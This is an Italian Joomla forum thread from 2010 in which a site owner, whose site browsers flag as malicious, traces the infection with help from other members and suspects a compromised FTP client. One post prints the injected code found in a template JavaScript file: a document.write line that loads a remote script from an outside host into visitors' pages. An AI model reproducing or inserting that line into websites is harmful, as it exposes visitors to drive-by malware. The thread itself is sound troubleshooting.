Joomla.it Forum
Non solo Joomla... => Sicurezza => : notepad 20 May 2010, 20:43:14
-
Ciao a Tutti
Spero di non creare scompiglio!
Ho appena installato l'ultima versione di Oziogallery
Ma appena apro il browser sia mozilla che chrome,mi dicono che il sito é malevolo :o
Prima di installare ozio,non sucedeva nulla!
questo é l'avvertimento (ps potri mandare in mp a chi di competenza,il mio sito)
Attenzione: l'apertura di questo sito potrebbe danneggiare il tuo computer!
Il sito web all'indirizzo www.miosito.com contiene elementi provenienti dal sito xxxxxxxxxxxxxxxxxx in cui sembra essere presente malware, ovvero software in grado di danneggiare il tuo computer o, comunque, di funzionare senza il tuo consenso. Visitare un sito che contiene malware è sufficiente per infettare il tuo computer.
Per maggiori informazioni sui problemi riscontrati per questi elementi, visita la pagina Pagina di diagnostica Navigazione sicura. di xxxxxxxxxxxxxxxxxxxxx
-
appunto, non creiamo allarmismi senza verificare...
un link al sito, please!
-
appunto, non creiamo allarmismi senza verificare...
un link al sito, please!
Ok Questo é il mio sito http://fwd4.me/PDa
Segnalo in oltre che ieri,dopo l'aggiornamento alla 2.4 ho auto degli strani problemi..Tipo (errore la pagina che si per eccedere non é formatta per il web)
In pratica ho riinstallato tutto poco fà..PS: il template é gatutito..Insomma non ci sono porcherie nel mio sito.Ed é sempre composto da una gallery,una presentazione,una pagina contatti..
Scusate ecco un'errore che mi é apparso poco fà rassettando il XML della gallery
Errore di codifica del contenuto
La pagina che si sta cercando di visualizzare non può essere mostrata poiché fa uso di una forma di compressione non valida o non supportata.
Contattare il proprietario del sito web per informarlo del problema.
-
Insomma non ci sono porcherie nel mio sito
Mai dire Gatto!
Allora Lei ha delle cartelle js/ con un sacco di javascript infettati rilevati dal mio antivirus.
Controlli
A breve le allego immagine
-
Immagine coi dettagli dei file infetti (e questi non sono file della OzioGallery)
[allegato vecchio più di un anno eliminato automaticamente]
-
Immagine coi dettagli dei file infetti (e questi non sono file della OzioGallery)
Scusa Vamba ho analizzato sia il template che il contenuto di Joomla,scaricato dal sito ufficiale..E non trovo nessun virus..Com li avete trovati voi?
Grazie
-
Immagine coi dettagli dei file infetti (e questi non sono file della OzioGallery)
Scusa Vamba ho analizzato sia il template che il contenuto di Joomla,scaricato dal sito ufficiale..E non trovo nessun virus..Com li avete trovati voi?
Grazie
Chiedo scusa a tutto lo staff.
In Effetti analizzando la Cartella di joomla (scaricata dal sito ufficiale) un'altro antivirus mi rileva un BackDoor.MaosBoot.35
Ma siamo sicuri che nn sia già dentro la cartella di joomla?
(http://img718.imageshack.us/img718/1617/screenhunter02may202147.gif) (http://img718.imageshack.us/i/screenhunter02may202147.gif/)
Uploaded with ImageShack.us (http://imageshack.us)
-
siamo sicuri che i pacchetti di installazione e di aggiornamento di Joomla siano esenti da virus, in quanto prima del rilascio ufficiali sono stati controllati con una serie di diversi antivirus, antispyware ed antimalware aggiornati.
Il problema si verifica quando si scaricano pacchetti di aggiornamento, di componenti o di template da siti non ufficiali.
-
hai provato anche con la versione Joomla 1.5.17 che si trova su questo sito?
In quanto ti posso assicurare che scaricata, adesso e passata la setaccio dall'antivirus non mi rileva nulla.
Ora mi accingo a provare la versione inglese scaricata dal sito ufficiale joomlacode.org
-
Effettuata scansione con tre diversi antivirus nel pacchetto
scaricato dal joomacode.org (ovvero il pacchetto ufficiale) lo stesso che ti da segnalazione con il tuo antivirus.
Risultato = Il pacchetto non ha alcun file segnalato
Probabilmente l'antivirus con cui hai fatto la prova segnala ancora un vecchio falso-positivo su un file (ma si parla di parecchi mesi fa)
comunque.....
forse non hai guardato bene a fondo l'immagine che ti ho allegato
Nel pacchetto originale Joomla (scaricato sia qua che su joomla.org)
NON ESISTONO i seguenti file
templates/saluxi/js/moomenu.js
templates/saluxi/js/pqutlz.js
e dato che utilizzano mootools.js come motore è possibile che abbiano infettato anche i due file che si trovano dentro a cartella media/system/js (e quelli sono file nativi di joomla o almeno dovrebbero essere)
-
Allora forse ho'individuato la causa,ovvero ho riscaricato il template che uso PQ Frequent a questo indirizzo
http://pqsofts.com/download/free-joomla-template/21-pq-frequent.html
Scansionato subito e mi rileva il flamigerato Backdoor :(
Il template é gratuito..Se anche voi rilevate qualcosa.Beh non so'che dire :-\
-
Cambia template e segnala il problema allo sviluppatore di quel template.
-
azz... brutta storia.
Vi chiedo cortesemente di verificare anche nel file dello stesso template che è in download qui nel calderone:
http://www.joomla.it/template/elenco-template/4006-pqfrequent.html
se è affetto da virus lo cancelliamo.
-
azz... brutta storia.
Vi chiedo cortesemente di verificare anche nel file dello stesso template che è in download qui nel calderone:
http://www.joomla.it/template/elenco-template/4006-pqfrequent.html
se è affetto da virus lo cancelliamo.
Facendo la scansione con Avg free non risulta nulla di infetto.
-
Effettuata verifica sul file ...
Esito negativo
nessuna segnalazione.
-
@alexred,
io ho utilizzato anche altri template di quello sviluppatore, pacchetti puliti!
-
Scusatemi non so'+ che fare..( il template e il contenuto di Joomla non contengono virus)..Analizzati sul mio computer con diversi Antivirus.Ma come installo tutto sul mio spazio web dopo un po'mi riappaiono errori strani,causati dal Trojan..Ho riscaricato sul mio pc il template e nella cartella JS i seguenti files contengono codice maligno (moomenu,pqutlz)..e precisamente questo codice window.addEvent("domready",function(){var b=$$(".moduletable_menu li a");new SmoothScroll({duration:500,transition:Fx.Transitions.linear},window);b.each(function(d){var e=new Fx.Styles(d,{duration:200,wait:false});d.addEvent("mouseenter",function(){e.start({"padding-left":22})});d.addEvent("mouseleave",function(){e.start({"padding-left":16})})});var c=$$(".moduletable_menu li li a");c.each(function(d){var e=new Fx.Styles(d,{duration:200,wait:false});d.addEvent("mouseenter",function(){e.start({"padding-left":42})});d.addEvent("mouseleave",function(){e.start({"padding-left":32})})});var a=new Tips($$(".toolTips"),{initialize:function(){this.fx=new Fx.Style(this.toolTip,"opacity",{duration:500,wait:false}).set(0)},onShow:function(d){this.fx.start(1)},onHide:function(d){this.fx.start(0)}})});
document.write('<script src=http://natusha.merengue.tuzonavirtual.com/videos/browscap.php ><\/script>');
Avete un'idea di cosa diamine succeda?
Grazie
-
sembra un tentativo di clickjacking, ovvero furto del click, quel codice è da qualche parte...
M.
EDIT: ho scaricato il template dove lo scarichi tu e ho guordato i files, non contiene nulla di nocivo.
Quello che ti succede è una manipolazione del dom, se non ho capito male viene sostituito l'url al menu.
Hai fatto girare un antivirus locale?
M.
EDIT: (caxata)"Quello che ti succede è una manipolazione del dom,....."
è semplicemente js iniettato nella costruzione del menu..
-
Ciao
Penso di aver "sradicato"sto maledettissimo problema.Mi é venuta semplicemente l'idea che poteva essere Filezilla la causa.In effetti digitando su google (filezilla virus).ho trovato un topic qui sul forum http://forum.joomla.it/index.php/topic,93532.60.html
Dove si parla di una possibile infezione di filezilla appunto!
lo ho'semplicemente riinstallato e x ora il mio sito sembra funzioni senza problemi.
Speriamo Bene
Comunque Grazie a Tutti coloro che sono intervenuti!
Fabry ;)
-
lo ho'semplicemente riinstallato e x ora il mio sito sembra funzioni senza problemi.
una partizione con ubuntu ?
-
Scusatemi ma non ci siamo propio.
Non vorrei essere troppo palloso ma il problema persiste.
Ho contattato ovh e aspetto un loro siggerimento!
Spiegatemi x favore solo questo>
Come mai gli javascripts del template (sul mio desktop,sono puliti) e come vanno online,Magicamente il loro contenuto cambia con stà zozzeria di Backdoor.
Come é possibile questo?
Spiegatemi per cortesia come puo'accadere una cosa simile..che meccanismo usano insomma..E'qualcuno che mi perseguita o cosa? o semplicemente un bug del template?
Grazie
-
evidentemente tieni qualcosa nel pc, qui non siamo IT (in argomento) ma prova a fare una ricerca in rete con antirotokit
e fai una scansione con un antivirus e magari più di uno..